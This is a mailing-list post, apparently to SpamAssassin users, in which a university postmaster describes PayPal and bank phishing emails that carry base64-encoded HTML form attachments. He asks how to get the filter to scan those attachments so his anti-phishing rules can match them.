I'm seeing a spate of PayPal/bank phishes that use an html attachment
(base-64 encoded) as the vehicle for the payload.
The body has some innocuous verbiage about problems with the recipients
account and an admonition to complete the attached form to remove
the "limitations".
The attached form is of type "application/octet-stream" with a name
that is of the form "something.html" so that it gets fed to a web-browser
when the victim clicks on it. The html is a form that collects the user's
info and then does a "post" to the attacker's collection site.
If I save the attachment and view it as a text file I can see lots of
things to write rules against (it even contains target URLs that are
listed in SURBL blacklists). However all attempts to create such rules
fail to to match (I'm assuming because of the "application/octet-stream"
mime type).
Is there any way to get SA to treat that attachment as text to feed to
the rule engine?
--
Dave Funk University of Iowa
<dbfunk (at) engineering.uiowa.edu> College of Engineering
319/335-5751 FAX: 319/384-0549 1256 Seamans Center
Sys_admin/Postmaster/cell_admin Iowa City, IA 52242-1527
#include <std_disclaimer.h>
Better is not better, 'standard' is better. B{
